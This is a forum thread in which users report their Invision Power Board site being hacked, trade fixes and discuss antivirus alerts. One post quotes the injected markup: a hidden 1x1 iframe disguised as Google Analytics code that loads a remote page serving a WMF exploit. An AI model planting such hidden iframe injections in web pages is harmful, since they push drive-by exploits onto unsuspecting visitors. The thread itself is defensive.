Have the forums been hacked?

[John Veteran]

Well Neowin is hardly the only Invision board out there; I'm sure other boards will be hacked (and probably are being hacked right now).

[zipgenius]

IPB has been used as a door to access to the server, but in fact that WMF loader was added also to my WordPress setup at www.zipgenius.it.

[RaisinCain]

Crazy!

[Japlabot]

I'm looking at the exploit at the remote website. Whoever wrote it has gone to a lot of trouble for obscure their code.

[John Veteran]

I'm looking at the exploit at the remote website. Whoever wrote it has gone to a lot of trouble for obscure their code.

I was noticing that too. I downloaded the code and tried to unobfuscate it, and it's still really difficult to see what it's doing.

[TimRogers]

LOL. Trend Micro had a spasm on that page :p Anyone worked out what it does yet? When someone does, it should be posted on the front page as a warning.

[CaptainSlow]

Hey, this happened on my site too.

I was looking for a fix of some sort yesterday and found this...

http://www.ipsbeyond.com/forums/index.php?showtopic=9706

There's a little explanation on how your forums got hacked and a very useful tool called "Ipb 2.1 Anti-virus Tool", It scans for suspicous files in your IPB directory and puts them in a list, however you have to delete them manually.

[zipgenius]

Hey, this happened on my site too.

I was looking for a fix of some sort yesterday and found this...

http://www.ipsbeyond.com/forums/index.php?showtopic=9706

There's a little explanation on how your forums got hacked and a very useful tool called "Ipb 2.1 Anti-virus Tool", It scans for suspicous files in your IPB directory and puts them in a list, however you have to delete them manually.

Good find :)

[CaptainSlow]

Just thought I would add that i'm getting the antivirus warnings again (as mentioned earlier in this thread).

[aos101]

Yes its back again, this time towards the bottom of the HTML source :( :

<!-- Start of Google analytics-->
<script src="https://www.google-analytics.com/urchin.js" type="text/javascript">
</script>

<script type="text/javascript">
_uacct = "UA-128683-1";
urchinTracker();
</script>
<div style="VISIBILITY: hidden; POSITION: absolute">
<iframe src="https://zchxsikpgz.biz/dl/adv543.php" width=1 height=1></iframe>
</div>
<!-- End of Google analytics -->

[accesser]

^I added it to the restricted url list in IE7 as suggested no problems since then before i was getting the popup that I posted in a screen capture above.

[Bobster]

And to everyone who doesn't like OneCare, it is having a fit everytime I go on the forums on IE7! :p

Firefox keeps me safe though *hugs Firefox* :wub:

[tomwarren Veteran]

Invisions code is getting as sloppy as Microsofts :|

[Aokromes]

Hi, the xploit is fixed on the last ipb 2.1.6 of 30 of June, the crap is located at ipb skin, use Generate Differences Report... at admin control panel to find it. It's somewhere at template html, at global html global_board_header > skin_global.

[chrismaddern]

Eeep.. it's back.

The same iFrame code.

Argh.. this is going to keep happening isn't it!?

Chris

[chopyaedoff]

Luckily I applied this update yesterday - http://forums.invisionpower.com/index.php?showtopic=220787

And my forums may not be at risk as much as they don't have (Powered by Invision Power Board) in the title.

[Stunna]

That code tries to load a remote malfomed .WMF file in order to hit unpatched Windows system.

so most people are safe from this, if you update your windows frequently?

How is vista and IE7+ handling this?

[+Elі Subscriber²]

It's not affecting IE7 under Vista at all, I have not tested on IE7 with XP though.

[Phalesafe]

I'm not having any probs, fixed it perhaps?

[Rowain]

Hi, the xploit is fixed on the last ipb 2.1.6 of 30 of June, the crap is located at ipb skin, use Generate Differences Report... at admin control panel to find it. It's somewhere at template html, at global html global_board_header > skin_global.

When the forum of the site in my sig was hit by this same exploit, the code was found in the config file. Deleting it from skin_global in the ACP did nothing.

[The_Decryptor Veteran]

Yay for IPB and IE :rolleyes: .

It's time like this that make me glad i don't use IE, or Windows (unless forced of course).

[Stunna]

is there a way to find out if you have been infected?

[Nashy]

Yay for IPB and IE :rolleyes: .

It's time like this that make me glad i don't use IE, or Windows (unless forced of course).

This isn't a thread to bash a good operating system though ;)

is there a way to find out if you have been infected?

Virus Scan.

[Kane]

Yay for IPB and IE :rolleyes: .

It's time like this that make me glad i don't use IE, or Windows (unless forced of course).

This isnt a thread for bashing, lets get back to the topic at hand. Thanks.

[lerum]

This isnt a thread for bashing, lets get back to the topic at hand. Thanks.

Didn't know you were a mod.

On topic- You had me worried as I have no virus scanner till I read that it didn't work in firefox *pets firefox* :D